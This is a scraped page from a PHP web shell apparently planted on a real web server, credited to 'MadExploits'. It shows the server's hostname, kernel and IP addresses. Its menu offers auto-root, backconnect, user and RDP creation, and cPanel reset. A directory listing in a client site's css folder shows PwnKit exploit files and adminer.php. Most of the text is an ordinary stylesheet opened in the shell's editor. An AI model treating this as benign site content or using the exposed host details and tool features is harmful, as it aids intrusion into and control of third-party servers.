Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.213
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
main-style.css
17.66
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main-style.css
@import url('https://fonts.googleapis.com/css2?family=Sumana:wght@400;700&display=swap'); @import url('https://fonts.googleapis.com/css2?family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&display=swap'); @import url('https://fonts.googleapis.com/css2?family=Archivo:ital,wght@0,100..900;1,100..900&display=swap'); :root { --black: #0F0B08; --white: #ffffff; --gray: #888888; --bc: #FAFAFA; } /*@import url('https://fonts.googleapis.com/css2?family=Sumana:wght@400;700&family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&family=Archivo:ital,wght@0,100..900;1,100..900&display=swap');*/ @font-face { font-family: 'Recoleta Regular DEMO'; font-style: normal; font-weight: normal; src: local('Recoleta Regular DEMO'), url('./fonts/Recoleta-RegularDEMO.woff') format('woff'); } .gc-gray { background-color: var(--bc); } .dm-sans { font-family: "DM Sans", sans-serif; } .sumana-regular { font-family: "Sumana", serif; font-weight: 400; font-style: normal; } .sumana-bold { font-family: "Sumana", serif; font-weight: 700; font-style: normal; } .archivo { font-family: "Archivo", sans-serif; } *, *::before, *::after { margin: 0; padding: 0; box-sizing: border-box; outline: none; } *:focus { outline: none; } body { font: normal 18px/27px "DM Sans"; color: #000; box-sizing: border-box; outline: none; } a { text-decoration: none; background-color: transparent; color: #19120E; } button, select { text-transform: none; } button, input, optgroup, select, textarea { margin: 0; font-family: inherit; font-size: inherit; line-height: inherit; } img { vertical-align: middle; border-style: none; max-width: 100%; } svg { overflow: hidden; vertical-align: middle; } ul, ol { padding: 0; margin: 0; list-style: none; list-style-type: none; } .custom-container { max-width: 1370px; width: 100%; margin: 0 auto; padding: 0 15px; } .pos-relative { position: relative; } .h-100 { height: 100%; } .flex-width { display: flex; gap: 2%; } .withgap { gap: 40px 0; } .flex-col { display: flex; flex-direction: column; } .mid-center { width: 100%; margin: auto; } /* hero slider */ @property --angle { syntax: '<angle>'; inherits: true; initial-value: 0deg; } .sm-btn-header { --angle: 0deg; padding: 40px; background: linear-gradient(#D0C078, #A57F3A, #D0C078) padding-box, conic-gradient(from var(--angle), #D0C078, #A57F3A) border-box; border: 2px solid transparent; -webkit-animation: rotate-gradient 3s infinite linear; animation: rotate-gradient 3s infinite linear; } @-webkit-keyframes rotate-gradient { from { --angle: 0deg; } to { --angle: 360deg; } } @keyframes rotate-gradient { from { --angle: 0deg; } to { --angle: 360deg; } } /* @property --r2 { syntax: '<angle>'; inherits: false; initial-value: 0deg; } @property --x { syntax: '<length>'; inherits: false; initial-value: 0px; } .sm-btn-header { --angle: 0deg; padding: 40px; background: linear-gradient(#D0C078, #A57F3A, #D0C078) padding-box, conic-gradient(from calc(var(--r2) - 80deg) at var(--x) , #D0C078, #FFFFFF) border-box; border: 2px solid transparent; } @keyframes x { 0% { --x: 80px; } 32.82275711% { --x: 520px; } 50% { --x: 520px; } 82.82275711% { --x: 80px; } 100% { --x: 80px; } } @keyframes rotating2 { 0% { --r2: 0deg; } 32.82275711% { --r2: 0deg; } 50% { --r2: 180deg; } 82.82275711% { --r2: 180deg; } 100% { --r2: 360deg; } } */ .heroslider { width: 100%; height: 100vh; background-repeat: no-repeat; background-size: cover; } .h1-txt { /* max-width: 809px;*/ max-width: 780px; width: 100%; color: #FFF; font: 400 144px/144px "Recoleta Regular DEMO"; text-shadow: 0px 4px 15px rgba(0, 0, 0, 0.25); text-transform: capitalize; position: absolute; bottom: 48px; } .vid-more { max-width: 306px; width: 100%; color: #FFF; position: absolute; right:15px; bottom: 70px; display: flex; flex-direction: column; gap: 1rem; align-items: flex-end; } /* popup css */ .overlay { position: fixed; top: 0; bottom: 0; left: 0; right: 0; background: rgba(0, 0, 0, 0.7); transition: opacity 500ms; visibility: hidden; opacity: 0; } .overlay:target { visibility: visible; opacity: 1; } .popup { margin: 70px auto; /*padding: 20px; border-radius: 5px; */ background: #fff; max-width: 888px; width:100%; position: relative; transition: all 5s ease-in-out; max-height: 90vh; } .flex-space { display: flex; justify-content: space-between; padding: 13px 8px 13px 16px; border-radius: 4px; } .popup h2 { font-weight: 400; } .popup .close { position: absolute; transition: all 200ms; right: 15px; top: 15px; z-index: 1; } .popup .close:hover { color: #06D85F; } .popup .content { max-height: 30%; overflow: auto; } .content { border-radius: 0px 0px 4px 4px; background: #000; } .content video { width:100%; height:70vh; } @media screen and (max-width: 700px){ .popup{ width: 95%; } } /* popup css */ /* hero slider end */ /* content -base */ .sec-content { padding: 136px 0 168px; } .width-888 { max-width: 888px; } .flex-width > div { flex: 0 0 49%; min-height: 650px; } .it-bold-text { justify-content: center; padding: 0 4rem; gap: 24px; color: var(--gray); box-shadow: 0px 0px 129.7px 0px rgba(0, 0, 0, 0.10); } .it-bold-text h2 { color: var(--black); font: normal 48px/55px "Sumana"; text-transform: capitalize; } .it-bold-text p { text-transform: capitalize; } .it-bold-imgvid { justify-content: center; border-radius: 25px; background: var(--white); box-shadow: 0px 0px 129.7px 0px rgba(0, 0, 0, 0.10); } .it-bold-imgvid img, .it-bold-imgvid video { width: 100%; height: 100%; border-radius: 25px; } /* content base */ /* reviews base */ .reviews { padding: 221px 0; } .width-1144 { max-width: 1144px; } .small-v1 { color: var(--gray); text-transform: capitalize; } .cm-city { margin: 24px 0 48px; color: #000; font: 400 64px/80px "Recoleta Regular DEMO"; text-transform: capitalize; } .trust-pilot span { font-size: 12px; font-family: Arial; } /* review base */ /* scan barcode */ .barcode-section { padding: 168px 0; } .rad-25 { border-radius: 25px; background-color: var(--white); } .dm-nc { border-radius: 25px; background-color: var(--white); box-shadow: 0px 0px 129.7px 0px rgba(0, 0, 0, 0.10); } .book-aps { justify-content: center; align-items: center; } .book-h2 { color: #000; font: normal 48px/51px "Sumana"; text-transform: capitalize; } .lmt-offer { color: #E40404; font: italic 500 15px/11px "DM Sans"; text-transform: capitalize; } .offer-txt { color: var(--gray); margin: 24px 0 40px; line-height:24px; text-transform: capitalize; } .bc-background { background: #0F0B08; } .bc-bold { background: linear-gradient(180deg, #C9B070 0%, #A57F3A 49%, #C9B070 100%); } .whatapp-green { background: linear-gradient(0deg, #1FAF38 -9900%, #60D669 100%); } .sm-btn { color: var(--white); height: 32px; font: 600 14px/24px "Archivo"; letter-spacing: 1.4px; text-transform: uppercase; text-align: center; border-radius: 4px; display: block; padding: 4px 16px 4px 8px; } .color-border { display: inline-flex; align-items: center; justify-content: center; gap: 1px; color: #0F0B08; border: 1px solid rgba(25, 18, 14, 0.25); background: var(--white); } .button-wrap { width: 100%; gap: 15px; } .scan-whatapp { padding: 0 5.87rem; align-items: center; justify-content: center; box-shadow: 0px 0px 129.7px 0px rgba(0, 0, 0, 0.10); } .qr-txt { color: var(--gray); text-transform: capitalize; } .whatapp_logo { margin: 24px 0 40px; } .animate_logo { border-radius: 25px; } .withgap .it-gold-content:nth-child(even) { flex-direction: row-reverse; } /* scan barcode */ /* footer */ .footer { background: #0F0B08; padding: 32px 0 0 0; } .flex-js { display: flex; justify-content: space-between; align-items: flex-start; } .full-divider { width: 100%; height: 0.5px; background: #68624F; margin: 80px 0 0; } .morebottom { padding: 16px 0; } .it_ul { display: flex; gap: 2rem; } .copy_cat p, .it_ul a { color: #68624F; font: 400 15px/24px "DM Sans"; } .asd_cap { color: #68624F; font: 400 14px/24px "DM Sans"; } .it_li { display: inline-flex; gap: 1rem; } .it_fmenu { max-width: 330px; width: 100%; display: flex; gap: 2rem; justify-content: flex-end; } .its_footer_link { flex: 0 0 44%; } .asdf_h3 { color: #D2B797; font: 400 18px/27px "DM Sans"; margin: 0 0 1rem; } .asdf_a { color: #68624F; font: 400 16px/27px "DM Sans"; text-transform: capitalize; } .asdf_ul { gap: 5px; } /* footer */ /* header */ .header-gold{ background: rgba(15, 11, 8, 0.85); padding:15px 0; position: fixed; z-index: 9; width: 100%; top: 0px; transition: top 0.3s ease; } .flex-sp-bt { display:flex; justify-content: space-between; } .asdh_ul{ display: flex; align-items: center; gap: 2.5rem; } .asdh_a{ font-size:1rem; color:#D2B797; text-transform: capitalize; } .sm-btn-header{ color:var(--white); font: 400 14px/24px "Archivo"; letter-spacing: 1.4px; text-transform: uppercase; padding: 10px 16px; border-radius: 4px; /*background: linear-gradient(180deg, #D0C078 0%, #A57F3A 49%, #D0C078 100%);*/ } .div_img, .hamburger { z-index: 9; position: relative; cursor: pointer; } .bar { display: block; background-color: #D2B797; width: 24px; height: 2px; margin: 6px auto; transition: all 300ms ease-in-out; } .hamburger.active-mm .bar:nth-child(1) { transform: translateY(8px) rotate(45deg); } .hamburger.active-mm .bar:nth-child(2) { opacity: 0; } .hamburger.active-mm .bar:nth-child(3) { transform: translateY(-8px) rotate(-45deg); } .heroslider { background-image: url('../img/hero.png'); } .form-group p { color:red; font-size:14px; } .form-group .iti--separate-dial-code .iti__selected-dial-code { font-size: 14px; } /*.asdh_ul li:nth-child(3), .asdh_ul li:nth-child(4),*/ .hide, .mbs, .banner-book, .mb-menucl { display:none; } .it-bold-text span, .it-bold-text a { color:#0F0B08; } .it-bold-text .date-loc { color: #707070; margin: 0 0 0.2rem; } .it-bold-text .date-mc { color: #113768; font: 500 16px/14px "DM Sans"; font-style: italic; } /* header */ /* faq page */ .faq { padding:9.75rem 0 136px; } .faqh1{ font: 400 48px/60px "Recoleta Regular DEMO"; margin-bottom:1rem; } .faq-head p { color: var(--gray); text-transform: capitalize; } .line1{ max-width:150px; width:100%; height:1px; margin:2.5rem 0; background: #D0C078; } .line_asd { width:100%; height:1px; background: #D0C078; margin:2rem 0 1.5rem; } .asd_qa { color:#707070; font: normal 18px/28px "DM Sans"; cursor: pointer; display: flex; justify-content: space-between; } .asd_ans { margin:1rem 0 0; color:#AAA; font: normal 16px/27px "DM Sans"; transition: all 0.5s ease-in-out; } .asd_qa span svg{ transition: all 0.4s ease; } .asd_li_faq.active .asd_qa span svg { transform: rotateZ(180deg); } /* location */ .itgold-txt h2 { font: normal 40px/46px "Sumana"; margin:0 0 1rem; text-transform: capitalize; } .itgold-txt p { color:#888; text-transform: capitalize; } .width-888 { max-width:888px; width:100%; margin:auto; } /* location */ .row-half { display:flex; gap:1rem; } .asd_fr_div { flex:0 0 49.1%; display: flex; flex-direction: column; gap: 1.5rem; } .form-group label { color: #707070; display:block; margin-bottom:7px; text-transform: capitalize; } .form-group input, .form-group select { border-radius: 4px; border: 1px solid #D2B797; width: 100%; padding: 7px 24px; color: #AAA; font: normal 16px/19px "DM Sans"; text-transform: capitalize; } .form-group select{ -moz-appearance: none; -webkit-appearance: none; appearance: none; background: url('../img/solar_arrow-up-line-duotone.svg') no-repeat right center; /* Add your custom arrow icon */ padding-right: 20px; /* Adjust as needed */ } .form-group .iti { width:100%; } .book-it-gold { display: flex; flex-direction: column; gap: 2.5rem; } .row-half .sm-btn-header { border:0; padding: 4px 8px; align-items: center; cursor: pointer; } .text-248 { padding:15.5rem 0; } .itgold-txt a { width: fit-content; margin-top:2.5rem; } .reset_btn { background: #E8E8E8; color:#AAAAAA; } .form-group input::placeholder{ color: #AAA; } .itgold-txt h2.bm { font: normal 64px/80px "Sumana"; } .table-responsivev1 { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch; -ms-overflow-style: -ms-autohiding-scrollbar; } #myTable { width: 100%; border-collapse: collapse; } /* Style table header */ #myTable th { background-color: #f2f2f2; border: 1px solid #ddd; padding: 8px; text-align: left; } /* Style table body rows */ #myTable td { border: 1px solid #ddd; padding: 8px; } /* Style alternate table rows */ #myTable tr:nth-child(even) { background-color: #f2f2f2; } /* faq */ .width-1114 { max-width:1114px; } .book-today { padding: 8.5rem 0; display: flex; align-items: center; gap:14.6%; } .text-today { flex:0 0 49%; } .text-dmp { flex:0 0 36.4%; } .text-dmp a { padding: 1rem 0.5rem; height: unset; display: inline-flex; align-items: center; justify-content: center; gap: 1rem; } .text-dmp a span { display: block; line-height: 10px; position: relative; top: 2px; } /* responsive */ @media (max-width: 1029px){ .heroslider { background-size: cover; background-position: 100% 100%; } } @media (max-width: 992px){ } @media (max-width: 767px){ .itgold-txt h2.bm { font: normal 40px/46px "Sumana"; } .asdh_ul { position: fixed; left: -100%; top: 0; width: 100%; height: 100vh; flex-direction: column; background: rgba(15, 11, 8, 0.85); transition: 750ms; gap: 0; align-items: flex-start; padding: 0 15px; padding-top: 6.7rem; /* gap: 1.2rem; align-items: center; justify-content: center; */ } .asdh_ul li:nth-child(3), .asdh_ul li:nth-child(4), .mb-menucl { display: block; } .asdh_ul.active-mm { left: 0; width: 100%; } .header-gold.active-mm{ background: unset; } .asdh_li { width:100%; border-bottom: 0.5px solid #D2B797; padding:1rem 0; } .asdh_li:last-child { border:0; } .sm-btn-header { display: block; text-align: center; position: absolute; width: calc(100% - 30px); bottom: 35px; } .heroslider { background-image: url('../img/dmk.png'); } .h1-txt { max-width: 250px; bottom: 90px; font: 400 64px/64px "Recoleta Regular DEMO"; } .sec-content { padding: 70px 0 40px; } .text-today, .text-dmp, .copy_cat_add, .asd_fr_div, .copy_cat, .flex-width>div { flex: 0 0 100%; width: 100%; min-height: unset; } .withgap .it-gold-content:nth-child(even), .it-gold-content { flex-direction: column-reverse; gap: 0; } .it-bold-text{ border-radius:0; border-top-left-radius: 24px; border-top-right-radius: 24px; padding: 0 1rem; gap: 1rem; padding: 2.5rem 1.5rem; gap: 1rem; background: #fff; } .it-bold-imgvid { border-radius:0; padding: 0 1rem 1rem 1rem; border-bottom-left-radius: 24px; border-bottom-right-radius: 24px; } .it-bold-imgvid img, .it-bold-imgvid video, .it-bold-imgvid .animate_logo { border-radius: 8px; max-width:326px; width:100%; height:326px; margin: auto; object-fit:cover; } .book-h2, .it-bold-text h2 { font: normal 40px/46px "Sumana"; } .it-bold-imgvid { background: unset; } .reset_btn, .scan-whatapp, .reviews { display:none; } .barcode-section { padding: 0 0 130px; } .row-half, .barcode-reviews { flex-direction: column; } .morebottom { flex-direction: column-reverse; } .book-today { padding: 3.75rem 1rem; flex-direction: column; gap:1rem; } .it_fmenu { max-width: 175px; gap: 2rem; flex-direction: column; } .full-divider { margin: 24px 0 0; } .it_li { gap: 0.5rem; flex-direction: column; align-items: flex-end; } .it_ul { justify-content: space-between; padding: 0 15px 1rem 15px; border-bottom: 0.5px solid #68624F; } .copy_cat { padding: 1rem 15px 0 15px; text-align: center; } .morebottom { margin: 0 -15px; } .banner-book { position: fixed; right: 15px; bottom: 2.5rem; z-index: 1; } .banner-book.sm-btn-header { width:auto; padding: 4px 16px; } .faq { padding: 6.25rem 0 136px; } .asd_fr_div { gap: 0.5rem; } button.asd_fr_div, .book-it-gold .sm-btn-header { position: unset; } .text-248 { padding: 8.5rem 0; } .vid-more { max-width: 160px; left:15px; bottom: 2.5rem; } .text-dmp a { padding: 0.5rem 0.5rem; gap: 0.5rem; } .text-dmp a span { top: 1.5px; } }
Close